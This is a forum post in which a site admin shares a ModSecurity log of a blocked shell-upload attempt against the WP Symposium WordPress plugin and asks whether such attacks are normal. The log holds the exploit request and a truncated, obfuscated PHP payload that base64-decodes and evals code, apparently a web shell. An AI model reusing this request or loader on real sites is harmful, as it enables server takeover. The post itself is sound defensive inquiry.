Hello,
I keep seeing this on modesec log. Modsec blocks an atack on wp symposium plugin but the plugin is not even installed.
But what I find strange is the obfuscated php code which in this case have about 1600 lines.
Here is what I see:
--7fa9ae1a-A--
[05/Nov/2015:02:10:35 +0000] Vjq6my5lEToAAAE@fXcAAAAA 37.115.188.178 6369 1 1.1.1.1 80
--7fa9ae1a-B--
POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1
Host: www.domain.com
Keep-Alive: 300
Connection: keep-alive
Cookie: wfvt_4200225226=563aba9ae34c0
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Content-Type: multipart/form-data; boundary=13530703071348311
Content-Length: 140407
--7fa9ae1a-C--
--13530703071348311
Content-Disposition: form-data; name="uploader_url"
http://www.domain.com/wp-content/plugins/wp-symposium/server/php/
--13530703071348311
Content-Disposition: form-data; name="uploader_uid"
1
--13530703071348311
Content-Disposition: form-data; name="uploader_dir"
./xjkJzT
--13530703071348311
Content-Disposition: form-data; name="files[]"; filename="EzDYexCw.php"
Content-Type: application/octet-stream
<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Tuesday, March 3rd, 2015 at 18:44 UTC from IP 94.185.85.45 (se)
Checksum: 64933339e4a4df8916a008a252ccc4fd401076e0
*/
$r8fb0ce9="\x62\141\x73\145\x36\x34\x5f\144\145\143\157\x64\145";@eval($r8fb0ce9(
"Ly9OT0pONmE4aFprYlB6dmRsdVcxNTlUMjh5MzJKVnltNmRudWNNU2o4MjAwWS9rRGMwSk9KdUVQMmtv
WkhvUlV5N2xMdTFXN2Nrb3RmdkhpT0RlbXVWelNCSlJUOXNtR2ljRU4yVkJCWmZIMjE4dXJFbGxFQllnN
ldCbVcvMU9SNURGRHhiWTl3K0gwRVBYSHdIa2NEUjN3REtoVUVZaFVpeUdqaEZpNGJ6NFluZWgzanRPOH
NoRTMvQjUvK0lqWCtiRm5iV245TkN3Nm9rY01KRzVmRTlwbmVRYmZiM0dvbWxoUXRMSWkyTUpMRnp5cTl
WbDZLMTlrTjh0VWN4NERWOEZyZ0VkWXdzL3A4TUVrOGZwbUdEMFREVWowQ3JQTEhENjgyMDZIYXpJc0ZT
VEp3MmNlRTByN0cyQWp3M3gyVkFGRzFMaXc1YnZFclNOR2QxTXM0eXNSdXVyZ3orZGxDK09XMGZPaURyS
XVOd1hwd3gzNndIQjJ3WDVyY1Z5VDlDSDF0QTNEeExPOXdPRjllVTVaWjZzL1FwcC9sT3MvaUdSNk5qOV
h3aVdSbFkwaVNBNnR1SzdsK2ppYnZtWE5vTDdhM2ZsWHVhc2pvekJRQy91enlCdllDUkJGRGU3ZVpTcC8
xZ0VRN2Z1dWFkc25pNy9KS3NCUjhpZ3h0NGF3OWZhSzYzaUdqVnhGSXJSaGdsWTArRjFTenRoNXlYVVkz
Zm91NGJTUzZZaGF5RC8vSWpLQmxmN2pGQTVkc2hSOG0ySlZuUVg0YzZMd2Y1bGlucGdwa2hFaEw5eUpOO
GZJeDAvREJ2eFBncnNtMmpzTjVYcWlKY21zZDhyUHU2L1RaRUJ5d2JBU3UwZGkxK1E2QTY3MVpXUm8zUW
J4ZGxUVEttdGhGamwvOVZYOENlTW9WNmd2bXpHckh2bElPTFJ6dWFmSTl1NHFTV3h5VUk0ZVVIOHlteCt
0V0hFRGl4WTZPc0pLdStWaXN0WG1UVE5xbFhqcUtVSVNJdzNqK3RHb0NxN3dVY1NWQ01TNkpUbC9OUFha
cmVkSE5vdThqczJ1Rkhxb3NZT3pvSkJwdlRlRjM2b29QbGxIbE0yN2N5aUNNdVBxOEorenB2UFV0R2NGZ
zd0QzE3S1V2cWpzSlk1YTY4MW9UcHQwRUJzZ3RidWIxcHNLZldnbkdSaXY5NUFkNmliNGhRYndTUExNNH
FRSk96QXg3Ky9WTitOOVcrUjU3amNzenFVVmRRd0tWQjBtWGRIYlBDWGpZQnNpOGxqTzNBVTN3Ni90NjN
KVDFqY0czOFlQdGxKT0Z1NXIvdHJhL2pOeGR1dndVMVVGTkRpVjkzL0Y0WEdEbnRUSEdoM1VBaFdTQnlV
Wnh2Ty96cXdnV0w1QnphbnRyZHRFcklZSHpYclpRSTVNT0tHVklHSkwrRjJlYURmb2Z5Nys0Ny9RWUdvZ
klzVXA0TXV2cytzT0ptNVBOMEhIUXl6dnhpZko4akdNWmlkNEE5cEEyVjhSWHE3Y3dmbVh1eElJSVRmeU
pKbm15dzh0YzdJaTUxSytyQzJiQkVtdW00NGZjZnE0WFl6cFhDVVRXOTJlSDRORFI4ekpvVHROTG9yUEt
PdFZJWGZEdEh2TXhGSlpYcUFWRER3Z2pncDQ0aU4xeW1OZ3JmOVJ1YmNNSzlJVTdQdng3SDk0MnB0YS82
--13530703071348311--
--7fa9ae1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 254
Keep-Alive: timeout=2, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
--7fa9ae1a-H--
Message: Access denied with code 403 (phase 2). Pattern match "\\.(?:php|js|pl)(?:\\.|$)" at FILES:files[]. [file "/usr/local/cwaf/rules/28_Apps_WPPlugin.conf"] [line "853"] [id "226070"] [rev "2"] [msg "COMODO WAF: Shell Upload Vulnerability WP Symposium plugin 14.11 for WordPress (CVE-2014-10021)"]
Action: Intercepted (phase 2)
Stopwatch: 1446689435117966 128971 (- - -)
Stopwatch2: 1446689435117966 128971; combined=4800, p1=591, p2=4141, p3=0, p4=0, p5=67, sr=57, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.2.15
Engine-Mode: "ENABLED"
I have shortened the obfuscated code but it was about 1600 lines
Is this normal?
Thanks.